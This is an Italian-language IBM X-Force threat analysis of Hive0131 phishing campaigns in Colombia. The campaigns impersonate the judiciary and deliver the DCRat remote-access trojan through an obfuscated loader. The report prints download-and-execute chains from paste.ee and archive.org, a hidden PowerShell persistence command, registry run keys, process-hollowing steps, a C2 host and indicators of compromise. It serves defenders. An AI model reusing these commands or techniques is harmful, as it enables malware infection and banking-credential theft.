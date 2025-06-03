Tag
Analisi delle minacce IBM X-Force: la presenza di DCRat cresce in America Latina

Una mano che digita su un laptop con uno scudo di sicurezza rosso e una grafica di e-mail in bilico sulla tastiera

All'inizio di maggio 2025, IBM X-Force ha osservato Hive0131 condurre campagne e-mail rivolte agli utenti in Colombia con notifiche elettroniche di procedimenti penali, presumibilmente provenienti dalla Magistratura della Colombia. Hive0131 è un gruppo finanziariamente motivato, probabilmente originario del Sud America, che conduce abitualmente campagne in gran parte in America Latina (LATAM) per consegnare un'ampia gamma di carichi di merci. Le campagne attuali imitano la corrispondenza ufficiale e contengono o un link incorporato o un'esca PDF con un link incorporato. Fare clic sul link incorporato avvierà la catena di infezione per eseguire il trojan bancario "DCRat" in memoria. 

DCRat è gestito come Malware-as-a-Service (MaaS), apparso per la prima volta almeno nel 2018 e ampiamente pubblicizzato sui forum russi dedicati alla criminalità informatica, ed è acquistabile per circa 7 USD per un abbonamento di due mesi. La presenza di DCRat è diffusa ed è diventata sempre più popolare in LATAM almeno dal 2024. Durante l'estate del 2024, X-Force ha osservato diverse campagne che hanno preso di mira pesantemente le entità in Colombia, imitando in tutti i casi un'azienda LATAM specializzata in ecosistemi di documenti elettronici in Messico e Colombia. Tuttavia, date le differenze nella catena di infezione e nella distribuzione di DCRat, X-Force ritiene che le campagne del 2024 e quelle attuali siano state condotte da attori diversi. Le campagne osservate nel 2024 si basavano in larga misura su file RAR protetti da password contenenti NSIS per eseguire un downloader GuLoader, mentre queste campagne recenti si basano su un caricatore .NET offuscato che abbiamo chiamato VMDetectLoader. 

Funzionalità DCRat

  • Bypassa l'AMSI
  • Rileva gli ambienti di analisi
  • Distrugge i processi in lista di blocco
  • Ottiene la persistenza attraverso un'attività pianificata o una chiave di registro
  • Ascolta i comandi di un server di comando e controllo (C2)

DCRat è dotato di plugin in grado di svolgere le seguenti attività, sebbene gli attori delle minacce possano creare plugin personalizzati per svolgere attività aggiuntive:

  • Registrazione di una vittima tramite il microfono o la telecamera del computer
  • Caricamento e download dei file
  • eseguire i comandi;
  • Acquisizione di informazioni di sistema
  • Crittografia e decrittografia dei file
  • Modifica delle chiavi di registro
  • Registrazione delle sequenze di tasti e dei dati degli appunti
  • Manipolazione del filesystem

Tipo di minaccia

MaaS

Uomo che guarda il computer

Analisi

All'inizio di maggio 2025, X-Force ha osservato delle campagne e-mail di Hive0131 che imitavano la Magistratura della Colombia (Rama Judicial de Colombia) e pretendevano di provenire dal Circuito Civile di Bogotá, Colombia, per inviare notifiche elettroniche di procedimenti penali. Le campagne osservate contengono o un'esca PDF con un link a un TinyURL oppure un link incorporato a una posizione Google Docs. 

Panoramica della catena di infezione - PDF con TinyURL

Per le e-mail contenenti un'esca PDF che porta a un tinyurl, la vittima viene reindirizzata a un archivio ZIP denominato 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.Uue. L'archivio ZIP contiene file innocui così come un file JavaScript malevolo denominato 1Juzgado 08 Civil Circuito de Bogotá Notificacion electrónica Orden de Embargo.js. Il file JavaScript scarica un payload JavaScript da un sito paste[.]ee  e lo esegue. Questo payload esegue quindi un comando PowerShell che scarica un JPG da hxxps://archive[.]org/download/new_ABBAS/new_ABBAS.jpg con un caricatore codificato in base64 aggiunto alla fine del file. Una volta eseguito, il caricatore scarica ed esegue il DCRat in memoria.

Il caricatore è chiamato VMDetectLoader per la sua capacità di determinare se è in esecuzione in un ambiente sandbox. L'analisi indica che il caricatore si basa sul progetto open-source https://github.com/robsonfelix/VMDetector.

Catena di infezione RAMA
Figura 1: Catena di infezione RAMA
Esempio di e-mail con esca PDF
Figura 2: Esempio di e-mail con esca PDF

Panoramica della catena di infezione - Link Google Docs incorporato

Questa catena di infezione viene avviata con e-mail di phishing che contengono un link a un download su Google Docs di un archivio ZIP protetto da password chiamato CUI 158616000129-2025-10047_122011111777.zip, la cui password è presente nell'e-mail ed è 3004L'archivio contiene un downloader di file batch, CUI 158616000129-2025-10047_122011111777.bat, che scarica ed esegue un componente VBScript (VBS) offuscato dahxxp://paste[.]ee/d/jYHEqBJ3/0  per %WinDir%\Temp\Pernambuco.vbs. Lo script VBS successivamente decodifica ed esegue uno script PowerShell codificato in base64 che scarica VMDetectLoader tramite un file JPG dahxxps://ia601205.us.archive[.]org/26/items/new_image_20250430/new_image[.]jpg
Il payload finale viene quindi scaricato da VMDetectLoader tramite un paste[.]EE URL passato dallo script PowerShell.

Catena di infezione RAMA con Google Docs
Figura 3: Catena di infezione RAMA con Google Docs
Esempio di e-mail con link a Google Docs
Figura 4: Esempio di e-mail con link a Google Docs

VMDetectLoader

VMDetectLoader è un loader .NET (Microsoft.Win32.TaskScheduler.dll) oscurato. che si può trovare su VirusTotal al https://www.virustotal.com/gui/file/0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7. L'analisi dei metadati del caricatore indica che il codice è basato sul progetto open-source https://github.com/robsonfelix/VMDetector.

Attributi di assemblaggio:

[assembly: AssemblyVersion("1.1.0.0")]
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
DebuggableAttribute.DebuggingModes.DisableOptimizations |
DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
[assembly: AssemblyTitle("VMDetector")]
[assembly: AssemblyCompany("Robson Felix")]
[assembly: AssemblyProduct("VMDetector")]
[assembly: AssemblyCopyright("Copyright © Robson Felix 2017")]
[assembly: AssemblyTrademark("")]
[assembly: TargetFramework(".NETFramework,Version=v4.5", FrameworkDisplayName = "")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]

Prima di caricare il payload, il caricatore rileva le macchine virtuali, stampando una lista degli attributi dell'host sulla console se viene rilevata una VM. Ad esempio:

MOTHERBOARD INFO
================
Availability = 3
Caption = Motherboard
ConfigManagerErrorCode =
ConfigManagerUserConfig =
CreationClassName = Win32_MotherBoardDevice
Description = Motherboard
DeviceID = Motherboard
ErrorCleared =
ErrorDescription =
InstallDate =
LastErrorCode =
Name = Motherboard
PNPDeviceID =
PowerManagementCapabilities =
PowerManagementSupported =
PrimaryBusType = PCI
RevisionNumber =
SecondaryBusType = ISA
Status = OK
StatusInfo =
SystemCreationClassName = Win32_ComputerSystem
SystemName = DESKTOP-LettersNumbers

--------------------------------------------------------------
Asserting ?
Detected as virtual machine given key computer information.
Detected as virtual machine given bios information.
Detected as virtual machine given hard disk information.
Detected as virtual machine given PnP devices information.
Detected as virtual machine given Windows services information.

Funzionalità

VMDetectLoader viene eseguito tramite la sua funzione dnlib.IO.Home.VAI()  e dati passati simili ai seguenti. Queste informazioni possono variare a seconda della campagna.

[dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]]
@($storeman,'','','','MSBuild','','','','','C:\Users\Public\Downloads','rhabdo
'rhabdosteus','js','','','bimetallism','1',''));

Argomento

Descrizione

$storeman

 URL Pastee invertito da cui viene scaricato un payload con codifica base64. 

MSBuild

 Processo di iniezione del target

C:\Users\Public\Downloads
rhabdosteus
js

 Percorso utilizzato per creare un'attività pianificata: 

C:\Users\Public\Downloads\rhabdosteus.js

1

 Flag che indica i controlli di processo

bimetallismo

 Nome dell'attività pianificata

Durante l'esecuzione, VMDetectLoader, XOR decripta le stringhe notevoli quando necessario dalla risorsa .NET "hIXS".

Un esempio di stringhe decrittografate all'interno delle cartelle

Esempio di stringhe decrittografate

vmware
Microsoft Virtual PC
{{ A = {0}, B = {1} }}
--------------------------------------------------------------
Microsoft Hyper-V
qemu
vbox
VirtualBox
BiosCharacteristics
{{ A = {0}, B = {1}, C = {2} }}
SYSTEM\CurrentControlSet\Services\
Caption
{{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I =
{8} }}
Win32_ComputerSystem
OEMStringArray
Win32_BIOS
Win32_MotherboardDevice
Win32_PnPEntity
Win32_DiskDrive
MOTHERBOARD INFO
================
BIOS INFO
=========
COMPUTER INFO
=============
DEVICES INFO
============
HARD DRIVES INFO
WINDOWS SERVICES
virtual
ImagePath
name
.exe
Name
Manufacturer
Model
Description
Detected as virtual machine given PnP devices information.
Detected as virtual machine given processes information.
Detected as virtual machine given Windows services information.

Persistenza

Se configurata in tal senso, viene creata un'attività pianificata per eseguire il seguente comando PowerShell che scarica ed esegue un payload JavaScript:

-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-
WebRequest -Uri '' -OutFile 'C:\Users\Public\Downloads\rhabdosteus.js'; Start-
Process 'C:\Users\Public\Downloads\rhabdosteus.js'"

Un altro compito può essere creato, se configurato, per eseguire il payload JavaScript usando il seguente comando:

wscript.exe C:\Users\Public\Downloads\rhabdosteus.js

Il caricatore può anche creare una chiave di esecuzione del registro per eseguire il payload:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run = <payload>.js

Iniezione di processo

VMDetectLoader ha la capacità di utilizzare la tecnica di iniezione di hollowing di processo per caricare un payload in diverse istanze di processo target. Ad esempio, per la campagna analizzata, C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (32-bit) o C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe (64-bit) è il processo target. La funzione responsabile dell'iniezione del processo si chiama HackForums.gigajew.x64.Load() per i campioni a 64 bit e dnlib.IO.Tools.Ande() per i campioni a 32 bit.

Processo di iniezione con svuotamento del processo:

  1. Creare un processo sospeso utilizzando CreateProcess() con dwCreationFlags impostato su CREATE_SUSPENDED (4).
  2. Annullare la mappatura di memoria nel processo target utilizzando ZwUnmapViewOfSection().
  3. Allocare nuova memoria nel processo di destinazione utilizzando VirtualAllocEx().
  4. Scrivere il payload nella memoria appena allocata utilizzando WriteProcessMemory().
  5. Aggiornare il punto di ingresso del processo utilizzando GetThreadContext() e SetThreadContex().
  6. Eseguire ResumeThread() per eseguire il codice.

DCRat

Se VMDetectLoader determina di essere in esecuzione in un ambiente sicuro, il payload finale viene caricato tramite lo svuotamento del processo. In questo caso, il payload finale è DCRat con i seguenti dati di configurazione.

----- File: Client.exe -----
Field         Value
------------  ----------------------------------------------------------------
Parser        acce:DcRat
File Path
Description   DcRat Implant (qwqdanchun)
Architecture  x86
MD5           eeed02e7ebbfe382b3d3af40fffb9ceb
SHA1          f2f9b1205bfcccb738b03531a8bce39478443463
SHA256        1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140
Compile Time  2021-05-05T21:11:39+00:00

---- Encryption Key ----
Tags           Key                                                                                           
Algorithm    Mode
-------------  ----------------------------------------------------------------------------------------------------  -----------  ------
configuration 
0x8cbd5d207b2b4ab52e36e1f749dac6c91bc7993ce3f926bc51f200db2c2cc3ab   
AES          CBC
configuration 
0xc801bfee49bb3da4722a6c6f67d6bd52e4cc5b6e00f6655c80f1d0b7e823341b229b274527da
ca070bf4659624c77d2819 HMAC-SHA256
                 0f2f5c75e985d9a1d59f72086b8811

---- Interval ----
  Value
-------
      1

---- Mutex ----
Value
---------------------
DcRatMutex_qwqdanchun
---- RSA Public Key ----
Tags              Value
----------------  -------------------------------------------------
x509_certificate  Modulus (n):

                      81:cf:a3:d5:04:94:07:91:c3:77:12:18:5b:ae:d3:
                      8b:66:ba:dd:aa:55:39:a2:f4:9a:e0:8b:f1:aa:4b:
                      49:e1:5e:67:69:ed:d1:e2:1d:ab:6b:f8:ef:0a:CB:
                      a9:05:6d:1c:37:39:de:2a:a2:b3:c4:e3:cb:be:56:
                      53:c7:bb:01:8c:59:20:c7:5a:fb:0d:ba:f8:ac:aa:
                      eb:29:bc:ef:9b:2b:03:53:e0:d8:5a:db:a9:56:5f:
                      e1:84:c8:4e:91:69:82:4d:e1:d3:b7:42:e2:f4:07:
                      14:fa:c1:c7:7a:83:6d:99:26:5f:f4:ba:e8:05:1a:
                      74:9b:24:49:b4:49:1b:4d
                  Public Exponent (e):
                      65537 (0x10001)

---- Socket ----
Tags    Address               Port  Network Protocol
------  ------------------  ------  ------------------
c2      feb18.freeddns.org    8848  TCP

---- Version ----
Value
-------
1.0.7
---- Miscellaneous ----
Key                             Value
------------------------------  ----------------------------------------------------------------------------------------------------
BSOD                            False
group                           ::: 30  :::
AntiProcess                     False
Anti                            False
self_installation_flag          False
x509_certificate_serial_number 
1073276135051967865277505007812279690413261813057
server_signature               
b"\x1a\xebHiD\x1d\xa5\x04\xa4\xce\xb4\xd8=9\x08d\xfa\xe2\xdeT\x14T\xdbX\x00\x1
x12<}\x7f\x91E7*r%f\xcei

\xde\x9d\xd9\x93\x08\xce\xc9\x8c\x1c\x98\x9e_O@j\xc0\xcb\x9a\x00)_\x05\x15M\xe
xe2\x9eg\x05a0p-\xac\x

11\xdd\xac\x7fa\x9e\xbc\x96\xc6F\xc6\xd426\x82\x16\x1d\x8c0\x95N\x0c\x19\x10\x
xb24\xa8\x9aRW'\x10E\
                                  xb3\xc3\xb5\x8d\x04-
-\xdb#\xc7\x9fW\x0c\x93\x91\x004\x16vq\xb5U|\xa8r"
server_signature_valid          True

---- Logs ----
[+] File Client.exe identified as DcRat Implant (qwqdanchun).
[+] Starting parser DcRat Implant (qwqdanchun) on sample Client.exe. Expected
results include c2 socket addresses, a version, a mutex, aes-cbc decryption
parameters, an SSL certificate and server signature, an interval, varying
flags, and possibly a filepath and a group.
[-] Cannot update settings field 0400000f.
[+] A dead-drop resolver URL is not set in the configuration.
[+] Completed parsing using DcRat Implant (qwqdanchun) for sample Client.exe.

----- File Tree -----
<Client.exe (eeed02e7ebbfe382b3d3af40fffb9ceb) : DcRat Implant (qwqdanchun)>

Conclusione

X-Force monitora diversi gruppi che operano nel landscape delle minacce latinoamericane e che conducono campagne e-mail che distribuiscono MaaS allo scopo di ottenere un guadagno finanziario. Tra i gruppi monitorati ci sono Hive0148 e Hive0149, che si concentrano sulla distribuzione del trojan bancario Grandoriero, Hive0153 che distribuisce i malware Adwind e SambaSpy e Hive0131. Sebbene Hive0131 si concentri solitamente su operazioni con distribuzione di malware quali QuasarRAT e NjRAT, X-Force ha osservato un aumento delle campagne che coinvolgono DCRat. Con la costante e continua osservazione del malware fornito agli utenti all'interno di LATAM, IBM X-Force valuta che l'America Latina continui ad affrontare il bersaglio da parte di attori delle minacce che cercano di implementare trojan bancari tramite campagne di phishing per ottenere credenziali e altre informazioni sensibili.

Raccomandazioni

Si raccomanda alle entità in America Latina di prestare attenzione alle e-mail contenenti allegati, link o che richiedono il download dei file. Inoltre, si consiglia alle entità di eseguire quanto segue:

  • Prestare attenzione alle e-mail che contengono link o prompt di download
  • Monitoraggio delle prove basate sull'host dell'iniezione di processi, della creazione di processi non autorizzati, della creazione di attività pianificate e delle modifiche al registro
  • Installare, aggiornare e configurare il software di endpoint security
  • Monitora le regole degli endpoint
  • A caccia del bypass della policy di esecuzione

Indicatori di compromesso

Indicatore

 Tipo di indicatore

  Contesto

4ce1d456fa8831733ac01c4a2a32044b6581664d3
11b8791bb2efaa2a1d01f17

 SHA256

 File del vettore 

6a632d8356f42694adb21c064aa9e8710b65addd
fdf2209d293ded12fe3d46a7

 SHA256

 Archivio ZIP

1603c606d62e7794da09c51ca7f321bb555044916
5b4fe81153020021cbce140

 SHA256

 DCRat

ceb88c09069b5ddc8ca525b7f2e26c4852465bc0
ed7c665df39c646287a2f17e    

 SHA256

 JS

0df13fd42fb4a4374981474ea87895a3830eddcc7f3
bd494e76acd604c4004f7

 SHA256

 Caricatore .NET offuscato

db21cc64fb7a7ed9075c96600b7e7e7007a0df7cb8
37189c6551010a6f828590

 SHA256

 Archivio ZIP

3c95678d140825b56e04298ce6238ce22b34611d25
82ac736c909296ca137ed1

 SHA256

 Script PS

7c3fbea63b7cdf013ef26831bb1850c80f4bfad0103328
de106b3d5491372ccf

 SHA256

 Script PS

b16588e0e2c6a0c8ff080ded57abe8159008d040ae
a78b2e801c17ce79f05863

 SHA256

 Scaricatore di script in batch

hxxps://tinyurl[.]com/2ypy4jrz?id=5541213d-0ed8
-4516-82e7-5460d4ebaf3b

 URL

 Link PDF incorporato

hxxp://paste[.]ee/d/bx699sF9/0

 URL

 URL per il download del payload

hxxps://docs[.]google[.]com/uc?export=download&id=1aJuQtm8YUqZv12E-atslt_GvBWZ
NbWIK

 URL

 Link e-mail incorporato

hxxp://paste[.]ee/d/jYHEqBJ3/0

 URL

 URL per il download del payload

hxxps://archive[.]org/download/new_ABBAS/new_
ABBAS.jpg

 URL

 URL di download JPG

hxxps://ia601205.us.archive[.]org/26/items/new_
image_20250430/new_image.jpg

   URL

 URL di download JPG

IBM® X-Force Premier Threat Intelligence è ora integrato con OpenCTI, offrendo informazioni fruibili sulle minacce e molto altro ancora. Accedi agli insight su attori delle minacce, malware e rischi di settore. Installa l' OpenCTI Connector per migliorare rilevamento e risposta, rafforzando la tua cybersecurity grazie all'esperienza di IBM X-Force. Rimani al passo con i tempi: esegui subito l'integrazione.

